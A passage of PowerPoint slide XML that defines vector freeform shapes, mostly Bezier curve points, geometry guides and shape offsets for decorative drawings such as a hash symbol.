                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="72"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="74"/>
                      <a:pt x="88" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="69"/>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4" y="72"/>
                      <a:pt x="91" y="75"/>
                      <a:pt x="87" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="83"/>
                      <a:pt x="76" y="82"/>
                      <a:pt x="73" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>
                      <a:pt x="65" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="73"/>
                      <a:pt x="64" y="75"/>
                      <a:pt x="63" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="79"/>
                      <a:pt x="61" y="81"/>
                      <a:pt x="60" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="86"/>
                      <a:pt x="57" y="89"/>
                      <a:pt x="57" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="58" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="99"/>
                      <a:pt x="57" y="100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="105"/>
                      <a:pt x="52" y="109"/>
                      <a:pt x="50" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="138"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="142"/>
                      <a:pt x="44" y="142"/>
                      <a:pt x="43" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="141"/>
                      <a:pt x="41" y="140"/>
                      <a:pt x="40" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="134"/>
                      <a:pt x="37" y="130"/>
                      <a:pt x="38" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="124"/>
                      <a:pt x="38" y="123"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                      <a:pt x="37"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70" y="170"/>
                      <a:pt x="69" y="173"/>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8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="196"/>
                      <a:pt x="73" y="194"/>
                      <a:pt x="72" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="189"/>
                      <a:pt x="70" y="186"/>
                      <a:pt x="69" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="184"/>
                      <a:pt x="68" y="183"/>
                      <a:pt x="68" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="182"/>
                      <a:pt x="71" y="182"/>
                      <a:pt x="72" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="184"/>
                      <a:pt x="76" y="186"/>
                      <a:pt x="79" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="188"/>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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="168"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="157"/>
                      <a:pt x="118" y="154"/>
                      <a:pt x="119" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="143"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="139"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="135" y="98"/>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5"/>
                      <a:pt x="124" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="103"/>
                      <a:pt x="121" y="99"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="87"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107"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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="52"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="100" y="30"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>
                      <a:pt x="88" y="34"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="41"/>
                      <a:pt x="87" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="44"/>
                      <a:pt x="87" y="46"/>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7" y="33"/>
                      <a:pt x="66" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="51"/>
                      <a:pt x="67" y="52"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="49"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="40"/>
                      <a:pt x="75" y="42"/>
                      <a:pt x="75" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="46"/>
                      <a:pt x="74" y="48"/>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7"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97"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6"/>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231"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5762" y="3343"/>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232"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5774" y="3343"/>
                <a:ext cx="5" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 4"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 3 w 4"/>
                  <a:gd name="T3" fmla="*/ 0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1"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="4" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="2"/>
                      <a:pt x="3" y="2"/>
                      <a:pt x="2"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233"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1951"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234"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2149"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235"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2299"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Freeform 236"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2446"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Freeform 237"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2643"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Freeform 238"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2792"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239"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2990" y="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240"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3140"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241"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3288"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Freeform 242"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="343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243"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3632"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Freeform 244"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="382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245"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4228"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Freeform 246"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4425"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247"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4575"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Freeform 248"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4723"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249"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4920"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8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4"/>
                      <a:pt x="0" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="31"/>
                      <a:pt x="11" y="29"/>
                      <a:pt x="16" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="24"/>
                      <a:pt x="27" y="21"/>
                      <a:pt x="32" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="16"/>
                      <a:pt x="43" y="13"/>
                      <a:pt x="48"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Freeform 250"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5070"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251"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="521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Freeform 252"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5414"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Freeform 253"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="560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Freeform 254"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5806"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255"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5943" y="13"/>
                <a:ext cx="188" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 188 w 188"/>
                  <a:gd name="T1" fmla="*/ 68 h 219"/>
                  <a:gd name="T2" fmla="*/ 185 w 188"/>
                  <a:gd name="T3" fmla="*/ 85 h 219"/>
                  <a:gd name="T4" fmla="*/ 141 w 188"/>
                  <a:gd name="T5" fmla="*/ 85 h 219"/>
                  <a:gd name="T6" fmla="*/ 130 w 188"/>
                  <a:gd name="T7" fmla="*/ 135 h 219"/>
                  <a:gd name="T8" fmla="*/ 177 w 188"/>
                  <a:gd name="T9" fmla="*/ 135 h 219"/>
                  <a:gd name="T10" fmla="*/ 173 w 188"/>
                  <a:gd name="T11" fmla="*/ 153 h 219"/>
                  <a:gd name="T12" fmla="*/ 126 w 188"/>
                  <a:gd name="T13" fmla="*/ 153 h 219"/>
                  <a:gd name="T14" fmla="*/ 112 w 188"/>
                  <a:gd name="T15" fmla="*/ 219 h 219"/>
                  <a:gd name="T16" fmla="*/ 91 w 188"/>
                  <a:gd name="T17" fmla="*/ 219 h 219"/>
                  <a:gd name="T18" fmla="*/ 106 w 188"/>
                  <a:gd name="T19" fmla="*/ 153 h 219"/>
                  <a:gd name="T20" fmla="*/ 64 w 188"/>
                  <a:gd name="T21" fmla="*/ 153 h 219"/>
                  <a:gd name="T22" fmla="*/ 49 w 188"/>
                  <a:gd name="T23" fmla="*/ 219 h 219"/>
                  <a:gd name="T24" fmla="*/ 29 w 188"/>
                  <a:gd name="T25" fmla="*/ 219 h 219"/>
                  <a:gd name="T26" fmla="*/ 43 w 188"/>
                  <a:gd name="T27" fmla="*/ 153 h 219"/>
                  <a:gd name="T28" fmla="*/ 0 w 188"/>
                  <a:gd name="T29" fmla="*/ 153 h 219"/>
                  <a:gd name="T30" fmla="*/ 3 w 188"/>
                  <a:gd name="T31" fmla="*/ 135 h 219"/>
                  <a:gd name="T32" fmla="*/ 47 w 188"/>
                  <a:gd name="T33" fmla="*/ 135 h 219"/>
                  <a:gd name="T34" fmla="*/ 57 w 188"/>
                  <a:gd name="T35" fmla="*/ 85 h 219"/>
                  <a:gd name="T36" fmla="*/ 10 w 188"/>
                  <a:gd name="T37" fmla="*/ 85 h 219"/>
                  <a:gd name="T38" fmla="*/ 14 w 188"/>
                  <a:gd name="T39" fmla="*/ 68 h 219"/>
                  <a:gd name="T40" fmla="*/ 60 w 188"/>
                  <a:gd name="T41" fmla="*/ 68 h 219"/>
                  <a:gd name="T42" fmla="*/ 74 w 188"/>
                  <a:gd name="T43" fmla="*/ 0 h 219"/>
                  <a:gd name="T44" fmla="*/ 96 w 188"/>
                  <a:gd name="T45" fmla="*/ 0 h 219"/>
                  <a:gd name="T46" fmla="*/ 81 w 188"/>
                  <a:gd name="T47" fmla="*/ 68 h 219"/>
                  <a:gd name="T48" fmla="*/ 124 w 188"/>
                  <a:gd name="T49" fmla="*/ 68 h 219"/>
                  <a:gd name="T50" fmla="*/ 137 w 188"/>
                  <a:gd name="T51" fmla="*/ 0 h 219"/>
                  <a:gd name="T52" fmla="*/ 158 w 188"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 188"/>
                  <a:gd name="T55" fmla="*/ 68 h 219"/>
                  <a:gd name="T56" fmla="*/ 188 w 188"/>
                  <a:gd name="T57" fmla="*/ 68 h 219"/>
                  <a:gd name="T58" fmla="*/ 120 w 188"/>
                  <a:gd name="T59" fmla="*/ 85 h 219"/>
                  <a:gd name="T60" fmla="*/ 78 w 188"/>
                  <a:gd name="T61" fmla="*/ 85 h 219"/>
                  <a:gd name="T62" fmla="*/ 67 w 188"/>
                  <a:gd name="T63" fmla="*/ 135 h 219"/>
                  <a:gd name="T64" fmla="*/ 109 w 188"/>
                  <a:gd name="T65" fmla="*/ 135 h 219"/>
                  <a:gd name="T66" fmla="*/ 120 w 188"/>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9">
                    <a:moveTo>
                      <a:pt x="188" y="68"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="185" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="68"/>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Freeform 256"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6159"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257"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6357"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Freeform 258"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6506" y="9"/>
                <a:ext cx="154" cy="247"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 127"/>
                  <a:gd name="T1" fmla="*/ 101 h 203"/>
                  <a:gd name="T2" fmla="*/ 123 w 127"/>
                  <a:gd name="T3" fmla="*/ 145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259"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6701"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Freeform 260"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6898"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261"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7045"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Freeform 262"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7244" y="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263"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7392"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Freeform 264"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7589"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265"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7739"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Freeform 266"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3986" y="0"/>
                <a:ext cx="219"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6 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 78 w 179"/>
                  <a:gd name="T87" fmla="*/ 44 h 209"/>
                  <a:gd name="T88" fmla="*/ 65 w 179"/>
                  <a:gd name="T89" fmla="*/ 35 h 209"/>
                  <a:gd name="T90" fmla="*/ 67 w 179"/>
                  <a:gd name="T91" fmla="*/ 48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09" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="198"/>
                      <a:pt x="80" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="199"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="209"/>
                      <a:pt x="53" y="209"/>
                      <a:pt x="48" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="38" y="204"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="197"/>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9" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="163"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="163"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="5" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="6" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="193"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="196"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="202"/>
